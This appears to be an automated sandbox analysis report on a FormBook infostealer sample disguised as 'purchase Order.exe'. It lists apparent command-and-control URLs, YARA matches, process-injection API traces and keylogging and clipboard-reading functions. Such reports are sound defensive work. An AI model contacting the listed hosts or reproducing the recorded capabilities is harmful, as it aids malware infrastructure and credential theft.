Source: bitsadmin.exe, 00000005.00000002.3222692242.00000000043FC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3224439751.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3222166926.0000000003E4C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.amayavp.xyz/d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
Source: McqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.t91rl7.pro
Source: McqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.t91rl7.pro/jhb8/
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bitsadmin.exe, 00000005.00000002.3222692242.0000000003F46000.00000004.10000000.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3222166926.0000000003996000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: bitsadmin.exe, 00000005.00000003.1806602205.0000000007B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C96B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C96B0C

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C96D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C96D07

Source: C:\Users\user\Desktop\purchase Order.exe

0_2_00C96B0C

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C82B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C82B37

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00C43D19
Source: purchase Order.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: purchase Order.exe, 00000000.00000000.1375066518.0000000000CEE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e11feb40-0
Source: purchase Order.exe, 00000000.00000000.1375066518.0000000000CEE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_32a0643d-5
Source: purchase Order.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f0c04a83-5
Source: purchase Order.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e5603c5c-f

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: purchase Order.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CA93 NtClose,	2_2_0042CA93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B60 NtClose,LdrInitializeThunk,	2_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,	2_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774340 NtSetContextThread,	2_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774650 NtSuspendThread,	2_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BF0 NtAllocateVirtualMemory,	2_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BE0 NtQueryValueKey,	2_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BA0 NtEnumerateValueKey,	2_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B80 NtQueryInformationFile,	2_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AF0 NtWriteFile,	2_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AD0 NtReadFile,	2_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AB0 NtWaitForSingleObject,	2_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F60 NtCreateProcessEx,	2_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F30 NtCreateSection,	2_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FE0 NtCreateFile,	2_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FB0 NtResumeThread,	2_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FA0 NtQuerySection,	2_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F90 NtProtectVirtualMemory,	2_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E30 NtWriteVirtualMemory,	2_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EE0 NtQueueApcThread,	2_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EA0 NtAdjustPrivilegesToken,	2_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E80 NtReadVirtualMemory,	2_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D30 NtUnmapViewOfSection,	2_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D10 NtMapViewOfSection,	2_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D00 NtSetInformationFile,	2_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DD0 NtDelayExecution,	2_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DB0 NtEnumerateKey,	2_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C70 NtFreeVirtualMemory,	2_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C60 NtCreateKey,	2_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C00 NtQueryInformationProcess,	2_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CF0 NtOpenProcess,	2_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CC0 NtQueryVirtualMemory,	2_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CA0 NtQueryInformationToken,	2_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773010 NtOpenDirectoryObject,	2_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773090 NtSetValueKey,	2_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037739B0 NtGetContextThread,	2_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D70 NtOpenThread,	2_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D10 NtOpenProcessToken,	2_2_03773D10

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C86685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00C86685

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C7ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C7ACC5

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C879D3

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C6B043	0_2_00C6B043
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C53200	0_2_00C53200
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C53B70	0_2_00C53B70
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7410F	0_2_00C7410F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C602A4	0_2_00C602A4
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7038E	0_2_00C7038E
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4E3B0	0_2_00C4E3B0
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C606D9	0_2_00C606D9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7467F	0_2_00C7467F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00CAAACE	0_2_00CAAACE
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C74BEF	0_2_00C74BEF
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C6CCC1	0_2_00C6CCC1
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4AF50	0_2_00C4AF50
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C46F07	0_2_00C46F07
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00CA31BC	0_2_00CA31BC
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C6D1B9	0_2_00C6D1B9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C5B11F	0_2_00C5B11F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7724D	0_2_00C7724D
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C6123A	0_2_00C6123A
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C813CA	0_2_00C813CA
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C493F0	0_2_00C493F0
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C5F563	0_2_00C5F563
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C496C0	0_2_00C496C0
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8B6CC	0_2_00C8B6CC
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C477B0	0_2_00C477B0
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C779C9	0_2_00C779C9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C5FA57	0_2_00C5FA57
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C49B60	0_2_00C49B60
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C47D19	0_2_00C47D19
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C69ED0	0_2_00C69ED0
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C5FE6F	0_2_00C5FE6F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C47FA3	0_2_00C47FA3
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_017CE458	0_2_017CE458
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418993	2_2_00418993
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401ACB	2_2_00401ACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F0B3	2_2_0042F0B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004101D3	2_2_004101D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004032F0	2_2_004032F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402A90	2_2_00402A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E3D3	2_2_0040E3D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004103F3	2_2_004103F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B8E	2_2_00416B8E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B93	2_2_00416B93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401C40	2_2_00401C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401C3A	2_2_00401C3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E51C	2_2_0040E51C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E523	2_2_0040E523
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402E49	2_2_00402E49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402E50	2_2_00402E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F19	2_2_00402F19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402720	2_2_00402720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038003E6	2_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C02C0	2_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038001AA	2_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730100	2_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F81CC	2_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764750	2_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C6E0	2_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03800591	2_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F2446	2_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EE4F6	2_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F6BD7	2_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380A9A6	2_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374A840	2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E8F0	2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037268B8	2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760F30	2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03782F28	2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732FC8	2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BEFA0	2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740E59	2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEE26	2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEEDB	2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752E90	2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FCE93	2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374AD00	2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373ADE0	2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03758DBF	2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740C00	2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730CF2	2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0CB5	2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372D34C	2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F132D	2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0378739A	2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E12ED	2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B2C0	2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037452A0	2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372F172	2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377516C	2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374B1B0	2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380B16B	2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F70E9	2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF0E0	2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EF0CC	2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037470C0	2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF7B0	2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F16CC	2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7571	2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DD5B0	2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03731460	2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF43F	2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFB76	2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B5BF0	2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377DBF9	2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FB80	2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B3A6C	2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFA49	2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7A46	2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EDAC6	2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DDAAC	2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785AA0	2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749950	2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B950	2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D5910	2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AD800	2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037438E0	2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFF09	2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFFB1	2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03741F92	2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749EB0	2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7D73	2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F1D5A	2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03743D40	2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FDC0	2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B9C32	2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFCF2	2_2_037FFCF2

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: String function: 00C5EC2F appears 68 times
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: String function: 00C6F8A0 appears 35 times
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: String function: 00C66AC0 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 98 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 56 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 275 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times

Source: purchase Order.exe, 00000000.00000003.1390512317.0000000004043000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs purchase Order.exe
Source: purchase Order.exe, 00000000.00000003.1390671585.00000000041ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs purchase Order.exe

Source: purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/8

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C8CE7A GetLastError,FormatMessageW,

0_2_00C8CE7A

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00C7AB84
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C7B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C7B134

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C8E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C8E1FD

